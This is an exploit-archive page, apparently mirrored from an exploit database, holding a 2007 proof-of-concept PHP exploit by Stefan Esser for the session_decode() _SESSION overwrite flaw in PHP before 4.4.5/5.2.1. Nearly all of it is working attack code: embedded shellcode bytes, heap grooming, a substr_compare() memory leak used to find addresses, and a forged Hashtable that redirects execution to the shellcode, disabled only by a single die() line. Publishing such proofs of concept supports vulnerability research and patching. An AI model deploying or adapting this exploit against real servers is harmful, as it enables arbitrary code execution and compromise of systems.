[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PHP < 4.4.5 / 5.2.1 _SESSION Deserialization Overwrite Exploit
# Published : 2007-03-25
# Author : Stefan Esser
# Previous Title : Linux Kernel <= 2.6.20 with DCCP Support Memory Disclosure Exploit
# Next Title : PHP < 4.4.5 / 5.2.1 _SESSION unset() Local Exploit
<?php
////////////////////////////////////////////////////////////////////////
// _ _ _ _ ___ _ _ ___ //
// | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ | || || _ //
// | __ |/ _` || '_|/ _` |/ -_)| ' / -_)/ _` ||___|| _/| __ || _/ //
// |_||_|__,_||_| __,_|___||_||_|___|__,_| |_| |_||_||_| //
// //
// Proof of concept code from the Hardened-PHP Project //
// (C) Copyright 2007 Stefan Esser //
// //
////////////////////////////////////////////////////////////////////////
// PHP session_decode() _SESSION Overwrite Vulnerability //
////////////////////////////////////////////////////////////////////////
// This is meant as a protection against remote file inclusion.
die("REMOVE THIS LINE");
$shellcode = "x29xc9x83xe9xebxd9xeexd9x74x24xf4x5bx81x73x13x46".
"x32x3cxe5x83xebxfcxe2xf4x77xe9x6fxa6x15x58x3ex8f".
"x20x6axa5x6cxa7xffxbcx73x05x60x5ax8dx57x6ex5axb6".
"xcfxd3x56x83x1ex62x6dxb3xcfxd3xf1x65xf6x54xedx06".
"x8bxb2x6exb7x10x71xb5x04xf6x54xf1x65xd5x58x3exbc".
"xf6x0dxf1x65x0fx4bxc5x55x4dx60x54xcax69x41x54x8d".
"x69x50x55x8bxcfxd1x6exb6xcfxd3xf1x65".
"x00x00x00x00x00x00x00x00x00x00";
findOffsets();
$Hashtable = pack("LLLLLLLLLCCC", 2, 1, 0, 0, 0, $offset_1+0x70, 0, $offset_1+0x70, $offset_1, 0, 0, 0);
$str = '_SESSION|s:39:"'.$Hashtable.'"|a|i:0;a|i:0;';
session_start();
session_decode($str);
// This function uses the substr_compare() vulnerability
// to get the offsets.
function findOffsets()
{
global $offset_1, $offset_2, $shellcode;
// We need to NOT clear these variables,
// otherwise the heap is too segmented
global $memdump, $d, $arr;
$sizeofHashtable = 39;
$maxlong = 0x7fffffff;
// Signature of a big endian Hashtable of size 256 with 1 element
$search = "x00x01x00x00xffx00x00x00x01x00x00x00";
$memdump = str_repeat("A", 4096);
for ($i=0; $i<400; $i++) {
$d[$i]=array();
}
unset($d[350]);
$x = str_repeat("x01", $sizeofHashtable);
unset($d[351]);
unset($d[352]);
$arr = array();
for ($i=0; $i<129; $i++) { $arr[$i] = 1; }
$arr[$shellcode] = 1;
for ($i=0; $i<129; $i++) { unset($arr[$i]); }
// If the libc memcmp leaks the information use it
// otherwise we only get a case insensitive memdump
$b = substr_compare(chr(65),chr(0),0,1,false) != 65;
for ($i=0; $i<4096; $i++) {
$y = substr_compare($x, chr(0), $i+1, $maxlong, $b);
$Y = substr_compare($x, chr(1), $i+1, $maxlong, $b);
if ($y-$Y == 1 || $Y-$y==1){
$y = chr($y);
if ($b && strtoupper($y)!=$y) {
if (substr_compare($x, $y, $i+1, $maxlong, false)==-1) {
$y = strtoupper($y);
}
}
$memdump[$i] = $y;
} else {
$y = substr_compare($x, chr(1), $i+1, $maxlong, $b);
$Y = substr_compare($x, chr(2), $i+1, $maxlong, $b);
if ($y-$Y != 1 && $Y-$y!=1){
$memdump[$i] = chr(1);
} else {
$memdump[$i] = chr(0);
}
}
}
// Search shellcode and hashtable and calculate memory address
$pos_shellcode = strpos($memdump, $shellcode);
$pos_hashtable = strpos($memdump, $search);
$addr = substr($memdump, $pos_hashtable+6*4, 4);
$addr = unpack("L", $addr);
// Fill in both offsets
$offset_1 = $addr[1] + 32;
$offset_2 = $offset_1 - $pos_shellcode + $pos_hashtable + 8*4;
}
?>
# www.Syue.com [2007-03-25]